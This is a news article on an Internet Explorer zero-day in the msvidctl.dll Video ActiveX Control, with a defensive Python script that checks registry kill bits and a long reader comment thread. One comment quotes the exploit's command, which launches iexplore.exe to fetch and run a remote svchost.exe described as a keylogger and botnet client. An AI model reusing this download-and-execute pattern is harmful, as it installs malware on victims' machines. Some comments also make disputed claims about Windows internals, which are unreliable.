Microsoft warns of serious IE exploit discovery

A critical security vulnerability has been discovered, and no fix is available yet. The exploit can hijack a computer remotely if the victim simply visits a compromised web site. The attack lets hackers break into the victim's computer through Microsoft's Video ActiveX Control.

The "zero day" vulnerability affects only Internet Explorer users, who are attacked via compromised web sites through a component the browser uses to play video. The exploit can only attack users running Windows XP and Windows Server 2003, using the msvidctl.dll file that hosts this ActiveX Control. Microsoft recommends removing support for this ActiveX Control within Internet Explorer.

A patch for the vulnerability could take months to prepare, so for now a temporary workaround has been posted on Microsoft's support web site under the "Fix it" feature. Users can enable or disable the workaround through Microsoft's web site.

Microsoft warns Windows XP and Windows Server 2003 users to enable the temporary workaround for now and also advises Windows Vista and Windows Server 2008 users to take these steps as a precaution. Internet Explorer 6 and 7 users are at risk but not Internet Explorer 8 users.
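
One way to verify that the workaround was applied, as an added example that is not from the article or from Microsoft. It assumes the workaround is implemented as Internet Explorer kill bits (flag 0x400 in the "Compatibility Flags" value under the "ActiveX Compatibility" registry key), which the article does not spell out, and it audits a registry export for them. The CLSIDs and the export below are constructed placeholders; the real Class Identifiers come from Microsoft's advisory.

```python
import re

# Assumption: the workaround sets IE "kill bits". A control is blocked in IE
# when this flag is set in its "Compatibility Flags" DWORD.
KILL_BIT = 0x00000400
COMPAT_KEY = (r"hkey_local_machine\software\microsoft"
              r"\internet explorer\activex compatibility")

SECTION_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
FLAGS_RE = re.compile(r'^"Compatibility Flags"=dword:(?P<val>[0-9a-fA-F]{1,8})$')
CLSID_RE = re.compile(r"^\{[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}\}$")

# Constructed sample .reg export with placeholder CLSIDs (not the real ones).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000000-0000-0000-0000-000000000001}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000000-0000-0000-0000-000000000002}]
"Compatibility Flags"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000000-0000-0000-0000-000000000004}]
"Compatibility Flags"=dword:00800400
'''

# Placeholder list standing in for the CLSIDs named in the vendor advisory.
EXPECTED = ["{00000000-0000-0000-0000-00000000000%d}" % n for n in (1, 2, 3, 4)]


def parse_compat_flags(reg_text):
    """Return {CLSID (upper-case): Compatibility Flags int} from a .reg export."""
    flags = {}
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        section = SECTION_RE.match(line)
        if section:
            parent, _, leaf = section.group("key").rpartition("\\")
            # Only track CLSID subkeys directly under the ActiveX Compatibility key.
            if parent.lower() == COMPAT_KEY and CLSID_RE.match(leaf):
                current = leaf.upper()
                flags.setdefault(current, 0)
            else:
                current = None
            continue
        value = FLAGS_RE.match(line)
        if value and current:
            flags[current] = int(value.group("val"), 16)
    return flags


def audit_kill_bits(reg_text, expected_clsids):
    """Map each expected CLSID to 'blocked', 'flag-missing' or 'no-key'."""
    flags = parse_compat_flags(reg_text)
    report = {}
    for clsid in expected_clsids:
        key = clsid.upper()
        if key not in flags:
            report[key] = "no-key"          # workaround never touched this CLSID
        elif flags[key] & KILL_BIT:
            report[key] = "blocked"         # kill bit set, other flags may coexist
        else:
            report[key] = "flag-missing"    # key exists but IE will still load it
    return report


if __name__ == "__main__":
    for clsid, state in audit_kill_bits(SAMPLE_REG, EXPECTED).items():
        print(clsid, state)
```

Any CLSID reported as "no-key" or "flag-missing" is still loadable by Internet Explorer on that machine.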

98 Comments


Thanks to the writer for the 'heads up' but as usual a thread like this gets infested by some immature participants who turn it into a 'my browser is better than yours' thread or 'I hate IE' thread. Do some of you guys actually compare your dick with that of your neighbours? Jeez, some people need to get out more........

But here's what rubs me wrong. MS quote from the ZDnet article "Our investigation has shown that there are no by-design uses for this ActiveX Control in Internet Explorer which includes all of the Class Identifiers within the msvidctl.dll that hosts this ActiveX Control. For Windows XP and Windows Server 2003 customers, Microsoft is recommending removing support for this ActiveX Control within Internet Explorer."

Therefore, if there are NO "by-design uses" why in the world did they leave that ActiveX Control active all this time? They have had YEARS to disable unused ActiveX controls! Now maybe I'm totally in left field, but doesn't MS control the valid Active X controls?

How many other Active X Controls with no "by-design uses" are still active and therefore ready to be the next zero-day news story?

It used to have uses, but it was deprecated. XP and earlier systems would still have it enabled because it was already there and enabled from before it fell out of use.

bbfc_uk said,
Anyone using IE6 really does need shooting, it's the swiss cheese of browsers. IE8 is the way forward...

Some people don't have a choice, particularly if it's a corporate PC... Shooting people for running IE6 because that is what is on their work pc and they often are unable to install anything else isn't nice


At where I used to work, they still have XP SP1, IE 6. They won't upgrade further because their IT department says that "any Windows OS beyond XP SP1 is not a safe environment to operate any size business."

UncleSpellbinder said,
At where I used to work, they still have XP SP1, IE 6. They won't upgrade further because their IT department says that "any Windows OS beyond XP SP1 is not a safe environment to operate any size business."


That's special right there

lordcanti86 said,
That's special right there

I thought that was pretty special myself. I wonder how a company that size (and it's a mid-size company with 4 plants in the U.S.) can operate with an IT department that obviously have no clue at all.

UncleSpellbinder said,
At where I used to work, they still have XP SP1, IE 6. They won't upgrade further because their IT department says that "any Windows OS beyond XP SP1 is not a safe environment to operate any size business."

Wow, at least they are honest... and could do with a lot more IT departments deciding being this honest. Of course the real reason is more likely that they can't afford moving to anything, what with all the testing and rewriting applications they would have to do, since not even ie7 is compatible with ie6. What a joke.

cakesy said,
Wow, at least they are honest... and could do with a lot more IT departments deciding being this honest. Of course the real reason is more likely that they can't afford moving to anything, what with all the testing and rewriting applications they would have to do, since not even ie7 is compatible with ie6. What a joke.


And that, my friend, is what's really going to hold the internet back. Companies either unwilling or unable to rewrite their web apps for something that's not IE6.

it's a conspiracy to force people to upgrade!

they is teh ebil!

why did they have to conveniently discover a vulnerability now?

I guess we are all safe. I've tried visiting the domains with the infection but they all time out. I think only noobs would get infected as you somehow have to run a file that downloads?

The code spawns a shell with the following call to download and run malicious code:
C:\[% programfiles%]\Internet Explorer\iexplore.exe "http://<domain removed>/wm/svchost.exe

The goal of this attack is to run the file "svchost.exe" on vulnerable systems. The file is a keylogger to record all keystrokes on your machine and also binds the machine into a C & C / BOT network. The code retrieves several accompanying components, installing a cocktail of malicious code on the compromised system.

cakesy said,
Yeah, thank god nobody would ever use this on another domain, because that is the law!

If you had bothered to read up on this you would know that all the infected websites redirect traffic to one domain.

Lepton said,
If you had bothered to read up on this you would know that all the infected websites redirect traffic to one domain.

So can you please explain how this can never be used again? How hard is it to setup another domain?? Let me tell you, not very hard.

I am not sure what you are saying, are you saying that we don't have to worry about this anymore?

ThePitt said,
interesting that microsoft is the one who warns about that...


Well, you'll probably be warned by Apple in the next Mac vs PC commercial.

it is proven to be an exploit on XP and server 2003 using IE6 and IE7. microsoft does warn that vista and server 2008 users should take precaution.

Better safe than sorry

The BoF vulnerability is in the MSVidCtl.dll (be it under XP or Vista or even 7). But it all comes down to the exploit. Writing a working exploit for a BoF that can circumvent ASLR+DEP is extremely difficult if not impossible in some cases (ASLR/DEP was only introduced in WinVista and later).

meriam said,
The BoF vulnerability is in the MSVidCtl.dll (be it under XP or Vista or even 7). But it all comes down to the exploit. Writing a working exploit for a BoF that can circumvent ASLR+DEP is extremely difficult if not impossible in some cases (ASLR/DEP was only introduced in WinVista and later).


Not only do you have ASLR/DEP, but IE runs in protected mode in Vista and Win7. This means that even if you are exposed to any unknown type of malware, it can't do anything to the computer. Think of protected mode as teflon or a nice sandbox...

darkmanx21 said,
So this is not for IE8 on Vista or 7? I think anyone using IE6 deserves to be hacked, lol.

+1. I don't know why anyone would continue to use IE6.

I got this earlier, from netscape so it isn't only an IE flaw.
<3 Application Protection, terminated the exe and deleted it... Looked at it a bit in notepad, it's got registry functions, along with the generic clipboard, internet, etc. so looks like trojans are being put on large video sites already

No offense, but it's time for you to get a real browser, bud. Using old outdated software can be very bad, especially for anyone you come into contact with on a day to day basis.

You've got plenty of choices these days too.

Well aside from my laptop which is using netscape 9 beta, on my other PC's I've got firefox 1.5, people bitch saying I should upgrade but no, I prefer the look and feel of 1.5 even though it memory leaks constantly. Closing tabs is done with the button on the right, not one on each of the tabs, and I prefer it this way!

n_K said,
Well aside from my laptop which is using netscape 9 beta, on my other PC's I've got firefox 1.5, people bitch saying I should upgrade but no, I prefer the look and feel of 1.5 even though it memory leaks constantly. Closing tabs is done with the button on the right, not one on each of the tabs, and I prefer it this way!

Move the close button to the right with about:config and set browser.tabs.closebuttons to 3

I found that in the first result of my first Google search. If there are other things you don't like about newer versions of Firefox I'm sure you can fix those too.

Dr_Asik said,
IE8 on Vista SP2 here - phew! Keeping up-to-date = maximum security. :)

Not using IE = maximum security + peace of mind

dafin0 said,
this is why people shouldn't be using 3 and 8 year old internet browsers

Usually for corporate policies, but also for computers that run fine and for customers that are pretty afraid to do some complex job (such as updating their PC).

The constant evolution (and involution) of the computer system must stop at some point, it is chaotic to think to switch products almost every 3 years.

DClark said,
IE8 + Windows 7 = Goodness

Anybody still using IE after all the problems, security vulnerabilities, is just asking for trouble. I can understand when we only had netscape, but there are so many superior browsers out there, this entire episode is a joke.

cakesy said,
Anybody still using IE after all the problems, security vulnerabilities, is just asking for trouble. I can understand when we only had netscape, but there are so many superior browsers out there, this entire episode is a joke.

:facepalm:

IE 6/7 are affected on windows XP/Server 2003. Fix=Update your ****.

cakesy said,
Anybody still using IE after all the problems, security vulnerabilities, is just asking for trouble. I can understand when we only had netscape, but there are so many superior browsers out there, this entire episode is a joke.



I guess other browsers don't get security vulnerabilities either eh? What twisted world do you live in?

cakesy said,
Anybody still using IE after all the problems, security vulnerabilities, is just asking for trouble. I can understand when we only had netscape, but there are so many superior browsers out there, this entire episode is a joke.


1) Yes

2) IE7 and IE8 have had less vulnerabilities than Firefox or Safari, or Chrome

3) The exploit is in the OS level ActiveX Control, not the BROWSERS

4) IE7 or IE8 on Vista or Win7 are the most secure way to browse the internet.

* IE in Vista or Win7 they run in 'protected mode' that runs in a low security mode sandbox. This is why when new web based vulnerabilities come around, they won't affect Vista or Win7 if you are running IE.

---

So if you have Vista or Win7 and ARE NOT running IE, you are either misinformed, or like exposing yourself to extra risks out of stupidity...

thenetavenger said,
1) Yes

2) IE7 and IE8 have had less vulnerabilities than Firefox or Safari, or Chrome

3) The exploit is in the OS level ActiveX Control, not the BROWSERS

4) IE7 or IE8 on Vista or Win7 are the most secure way to browse the internet.

* IE in Vista or Win7 they run in 'protected mode' that runs in a low security mode sandbox. This is why when new web based vulnerabilities come around, they won't affect Vista or Win7 if you are running IE.

---

So if you have Vista or Win7 and ARE NOT running IE, you are either misinformed, or like exposing yourself to extra risks out of stupidity...


I'm aware of this, but I prefer Firefox because of addons like Firegestures (Or Opera) and adblock. Jus sayin or else I'd be on IE8.

thenetavenger said,
1) Yes

2) IE7 and IE8 have had less vulnerabilities than Firefox or Safari, or Chrome

3) The exploit is in the OS level ActiveX Control, not the BROWSERS

4) IE7 or IE8 on Vista or Win7 are the most secure way to browse the internet.

* IE in Vista or Win7 they run in 'protected mode' that runs in a low security mode sandbox. This is why when new web based vulnerabilities come around, they won't affect Vista or Win7 if you are running IE.

---

So if you have Vista or Win7 and ARE NOT running IE, you are either misinformed, or like exposing yourself to extra risks out of stupidity...

Ha ha ha, funny stuff. There is no way that ie7 and ie8 are less vulnerable than almost any browser out there. You are clearly making stuff up, or why don't you show some actual studies to prove this point, with actual points we can refute. I would trust anything, even something made by real networks over ie. Sure, ie8 is not a bad browser, and it is good to see that MS are at least trying to catch up to the competition.

Maybe you forget who introduced the complete travesty that is ActiveX onto us?

4) - complete and utter load of ********. If you believe this then you're a danger to you, and anyone you advise. I hope you don't actually work in IT for a living. Win 7 is a move in the right direction, but since it hasn't even been released yet we have no way to be sure how safe it is. The problem MS has is that they are building their OS on top of an OS that has NO security built into it all, Win 3.1.

thenetavenger said,
4) IE7 or IE8 on Vista or Win7 are the most secure way to browse the internet.

+1

The problem with Firefox is that you only need to get arbitrary code running in the browser process and it's game over.

cakesy said,

Ha ha ha, funny stuff. There is no way that ie7 and ie8 are less vulnerable than almost any browser out there. You are clearly making stuff up, or why don't you show some actual studies to prove this point, with actual points we can refute. I would trust anything, even something made by real networks over ie. Sure, ie8 is not a bad browser, and it is good to see that MS are at least trying to catch up to the competition.

Maybe you forget who introduced the complete travesty that is ActiveX onto us?

4) - complete and utter load of ********. If you believe this then you're a danger to you, and anyone you advise. I hope you don't actually work in IT for a living. Win 7 is a move in the right direction, but since it hasn't even been released yet we have no way to be sure how safe it is. The problem MS has is that they are building their OS on top of an OS that has NO security built into it all, Win 3.1.

Windows 7 is built on Windows NT, or am I missing something here?

DClark said,
IE8 + Windows 7 = Goodness

u mean ff 3.5 + win7=holyness

When i use IE8 on my core 2 duo with 4GB ram running windows 7 x64 it lags so bad that i get frustrated

Ridlas said,
u mean ff 3.5 + win7=holyness

When i use IE8 on my core 2 duo with 4GB ram running windows 7 x64 it lags so bad that i get frustrated

I agree. The lag is utterly ridiculous. Something as simple as opening a new (Empty) tab takes forever... :-

bbfc_uk said,
Windows 7 is built on Windows NT, or am I missing something here?

Nope. You're not missing anything. He's just horribly misinformed.

cakesy said,
Ha ha ha, funny stuff. There is no way that ie7 and ie8 are less vulnerable than almost any browser out there. You are clearly making stuff up, or why don't you show some actual studies to prove this point, with actual points we can refute. I would trust anything, even something made by real networks over ie. Sure, ie8 is not a bad browser, and it is good to see that MS are at least trying to catch up to the competition.

Maybe you forget who introduced the complete travesty that is ActiveX onto us?

4) - complete and utter load of ********. If you believe this then you're a danger to you, and anyone you advise. I hope you don't actually work in IT for a living. Win 7 is a move in the right direction, but since it hasn't even been released yet we have no way to be sure how safe it is. The problem MS has is that they are building their OS on top of an OS that has NO security built into it all, Win 3.1.

It's called Protected Mode. Might wanna get your facts straight there, smart guy.

bbfc_uk said,
Windows 7 is built on Windows NT, or am I missing something here?


Nope.

We might as well take his suggestion all the way and claim Windows 7 x64 still has MS-DOS sitting at the bottom somewhere.

bbfc_uk said,
Windows 7 is built on Windows NT, or am I missing something here?

It is win3.1 all the way down, baby.

You do know that NT didn't come out of thin air, sure it was a big redesign of the code, but a lot of the elements of 3.1 are in NT. Or did you think it was a huge coincidence that THEY LOOKED EXACTLY THE SAME. (3.1 and nt 3.5)

And along with this, notice that both OS were vulnerable with the image bug, that came up last year. You probably won't remember it,... there has been a couple of windows bugs, not that anyone on here would admit to it.

So there are parts of 3.1 still in Vista, how much WE WILL NEVER KNOW, since Microsoft don't release the source code... Well, plenty of us do know, people who really look into this stuff, but most tech people won't. But then again, most people are just happy accepting anything that MS give them.

cakesy said,
It is win3.1 all the way down, baby.

You do know that NT didn't come out of thin air, sure it was a big redesign of the code, but a lot of the elements of 3.1 are in NT. Or did you think it was a huge coincidence that THEY LOOKED EXACTLY THE SAME. (3.1 and nt 3.5)

And along with this, notice that both OS were vulnerable with the image bug, that came up last year. You probably won't remember it,... there has been a couple of windows bugs, not that anyone on here would admit to it.

So there are parts of 3.1 still in Vista, how much WE WILL NEVER KNOW, since Microsoft don't release the source code... Well, plenty of us do know, people who really look into this stuff, but most tech people won't. But then again, most people are just happy accepting anything that MS give them.

Big wow. An OS with bugs in it with various GUI similarities between versions, and a COMMERCIAL company trying to save money by recycling code. Who'da thought it.

/sarcasm

And all that's going to change as they're meant to be starting from (pretty much) scratch with Midori due for release after Windows 8 IIRC.

Yes, they will eventually ditch Windows for this managed-code based OS (and yes, I'm dubious about how well it will perform because of this).

cakesy said,


Ha ha ha, funny stuff. There is no way that ie7 and ie8 are less vulnerable than almost any browser out there. You are clearly making stuff up, or why don't you show some actual studies to prove this point, with actual points we can refute. I would trust anything, even something made by real networks over ie. Sure, ie8 is not a bad browser, and it is good to see that MS are at least trying to catch up to the competition.

Maybe you forget who introduced the complete travesty that is ActiveX onto us?

4) - complete and utter load of ********. If you believe this then you're a danger to you, and anyone you advise. I hope you don't actually work in IT for a living. Win 7 is a move in the right direction, but since it hasn't even been released yet we have no way to be sure how safe it is. The problem MS has is that they are building their OS on top of an OS that has NO security built into it all, Win 3.1.


Wow, both of these posts are written by people who would rather argue than be honest. Over the last 2 years IE has had about the same number of vulnerabilities and patches as other popular browsers. Yes, there are studies if you don't want to take my word for it but Google them yourself, I am not going to spoon feed anyone. To this point number 4, wow, I hope that person doesn't actually do any IT work either. Windows NT has always been built around a secure execution model similar to UNIX. The Windows 9x system (which shares some roots from 3.1) was not. The last version of Windows 9x was ME. Starting with Windows 2000 (which was primarily marketed as a business OS) home users had an operating system available based on the NT code base, XP put it out there to the masses.

cakesy said,
It is win3.1 all the way down, baby.

You do know that NT didn't come out of thin air, sure it was a big redesign of the code, but a lot of the elements of 3.1 are in NT. Or did you think it was a huge coincidence that THEY LOOKED EXACTLY THE SAME. (3.1 and nt 3.5)

And along with this, notice that both OS were vulnerable with the image bug, that came up last year. You probably won't remember it,... there has been a couple of windows bugs, not that anyone on here would admit to it.

So there are parts of 3.1 still in Vista, how much WE WILL NEVER KNOW, since Microsoft don't release the source code... Well, plenty of us do know, people who really look into this stuff, but most tech people won't. But then again, most people are just happy accepting anything that MS give them.


Dude!! You are so clueless I'm not sure I should even reply. Windows NT was built from the ground up by a joint effort between MS and IBM (IBM pulled out before the project was finished and used their work on the project to build their own OS2, then the two sued each other for stealing the other's work from the failed collaboration, but that is a side story). Yes, the GUI was the same, the goal of Windows NT was to build a stable and secure OS, not redesign the user interface. So yes, they used a lot of the same helper apps (program manager, file manager, in later versions explorer.exe) but the way the system works under the covers is 100% different. It doesn't take much digging around to see this first hand.

To the point about the image vulnerability, that has nothing to do with the OS...but it sounds like you do not understand the difference between an operating system and an application so you might not be able to follow. MS had a common code library for working with JPG images, that library was used by any MS app that needed JPG support. When a vulnerability was found, yes, it affected everything that used that code library including picture viewer applications from both OS (but not the core OS itself) and a whole slew of other MS applications. Not that you will understand this, but that was a user level vulnerability, not a kernel or system level, it had nothing to do with the operating system.

From a simple point of view, yes, clearly everything that comes on the install media could be considered part of the OS and from that point of view, yes, there still are some included applications that use the same code as those included with Windows 3.1 or 95 (calc, paint, backup, wordpad, Outlook Express and even Internet Explorer are a few that come to mind), but none of these applications have anything to do with OS security in the manner you are implying.

cakesy said,
It is win3.1 all the way down, baby.

You do know that NT didn't come out of thin air, sure it was a big redesign of the code, but a lot of the elements of 3.1 are in NT. Or did you think it was a huge coincidence that THEY LOOKED EXACTLY THE SAME. (3.1 and nt 3.5)

And along with this, notice that both OS were vulnerable with the image bug, that came up last year. You probably won't remember it,... there has been a couple of windows bugs, not that anyone on here would admit to it.

So there are parts of 3.1 still in Vista, how much WE WILL NEVER KNOW, since Microsoft don't release the source code... Well, plenty of us do know, people who really look into this stuff, but most tech people won't. But then again, most people are just happy accepting anything that MS give them.


No, NT is a brand new kernel. It doesn't contain parts of 3.1. Just because they use similar resource files for the UI bits doesn't imply at all that the kernel is built on it. Heck, NT isn't even 16 bit like Windows 3.1 was. Additionally, Windows 3.1 was built on DOS, which NT wasn't.